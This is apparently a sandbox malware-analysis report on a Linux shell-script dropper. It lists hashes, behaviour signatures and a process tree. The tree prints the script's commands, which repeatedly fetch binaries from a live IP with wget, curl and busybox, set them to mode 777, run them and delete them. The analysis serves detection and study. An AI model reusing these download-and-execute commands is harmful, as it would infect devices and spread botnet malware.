Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
19/10/2024, 01:51
Static task
static1
Behavioral task
behavioral1
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
-
Size
10KB
-
MD5
6a9652c294e5e9472ed245126df7a12a
-
SHA1
6b6211e9cda29897067be245039e7aec7b482f0e
-
SHA256
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7
-
SHA512
ebcee321431404cd9392dfec9d38e04b4cfc838bcb99512498730ea32d583d7690bcf26b0717df741102327d4f6330ca8730f3e433fd34db2250e20884c3db99
-
SSDEEP
192:2k07BhIIeyXF6IyR00QN+m0EX4q2Mk03BhISeyXF6I6i0QN+mlw:2k0BeyXoIyRlC4q2Mk0heyXoI6X
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 834 chmod 862 chmod 899 chmod 905 chmod 911 chmod 971 chmod 748 chmod 917 chmod 923 chmod 947 chmod 755 chmod 983 chmod 813 chmod 881 chmod 893 chmod 929 chmod 959 chmod 785 chmod 953 chmod 824 chmod 875 chmod 887 chmod 935 chmod 977 chmod 989 chmod 763 chmod 941 chmod 965 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi 749 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS 756 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb 764 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz 787 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm 814 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ 825 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V 835 FhITldMHonjpiCltv4sk55YKSWt040cZ3V /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN 863 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I 876 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK 882 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx 888 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS 894 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz 900 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav 906 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx 912 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS 918 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz 924 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav 930 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK 936 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi 942 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS 948 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb 954 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz 960 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm 966 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ 972 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V 978 FhITldMHonjpiCltv4sk55YKSWt040cZ3V /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN 984 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I 990 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK curl File opened for modification /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz curl File opened for modification /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi curl File opened for modification /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz curl File opened for modification /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm curl File opened for modification /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ curl File opened for modification /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN curl File opened for modification /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav curl File opened for modification /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm curl File opened for modification /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx curl File opened for modification /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V curl File opened for modification /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I curl File opened for modification /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav curl File opened for modification /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx curl File opened for modification /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V curl File opened for modification /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN curl File opened for modification /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I curl File opened for modification /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS curl File opened for modification /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS curl File opened for modification /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz curl File opened for modification /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb curl File opened for modification /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS curl File opened for modification /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS curl File opened for modification /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK curl File opened for modification /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz curl File opened for modification /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb curl File opened for modification /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ curl File opened for modification /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi curl
Processes
-
/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:746
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:754
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:760
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:782
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:810
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:823
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:829
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:857
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:874
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:880
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:886
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:892
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:898
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:904
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:910
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:916
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:922
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:928
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:934
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:940
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:946
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:950
-
-
